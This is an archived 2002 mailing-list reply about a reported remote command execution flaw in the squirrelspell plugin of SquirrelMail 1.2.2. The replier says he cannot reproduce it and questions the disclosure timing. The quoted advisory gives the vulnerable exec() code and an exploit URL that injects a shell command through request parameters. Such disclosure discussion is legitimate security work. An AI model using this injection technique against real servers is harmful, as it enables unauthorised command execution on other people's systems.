Re: squirrelmail bug

[Adam Herscher <adam () xtime com>]

I'm unable to repro on squirrelmail 1.2.2 + openbsd 2.9:

Fatal error: Call to undefined function: sqspell_getlang() in
/usr/local/www/htdocs/www2.axisproductions.com/webmail/plugins/squirrelspell/modules/check_me.mod.php
on line 59

I'm also curious how much notice this person gave to the Squirrelmail
development team to prepare a fix before releasing it to the world.. (same
thought applies to the random cross-scripting vulnerability just sent out
3 seconds ago)

On anothre note Squirrelmail 1.2.3 was released 01/21/02.. I was wondering
if anyone has had the opportunity to test against it.  This specific issue
doesn't seem to have been noted in the changelog:

http://www.squirrelmail.org/changelog.php

Attempted to contact off-list earlier, but it seems the sender's mx is
having problems.

<appelast () bsquad sm pl>:
213.134.128.227 does not like recipient.
Remote host said: 550 5.7.1 <appelast () bsquad sm pl>... Relaying denied
Giving up on 213.134.128.227.




On Thu, 24 Jan 2002 appelast () bsquad sm pl wrote:

> Squirrelmail remote execute commands bug
>
> Version Affected :
> 1.2.2
>
> Squirrelmail is a webmail system, which allows users to send, get, read
> etc.
> mails. It has some themes, plugins etc. One of the plugins has a very 
> interesting piece of code :
>
> from file check_me.mod.php :
>
> $sqspell_command = $SQSPELL_APP[$sqspell_use_app];
> ...
> $floc = "$attachment_dir/$username_sqspell_data.txt");
> ...
> exec ("cat $floc | $sqspell_command", $sqspell_output);
>
>
> Everything should be ok, but where this page includes config files,
> where 
> are defined $attachment_dir and others ? Answer: Nowhere. We can set up 
> variables $sqspell_command and $floc. Result ? We can execute any
> command
> of course as a http serwer owner.
>
> Exploit :
>
> host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wa
> ll%
> 20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=p
> lik
>
> <appelast () bsquad sm pl>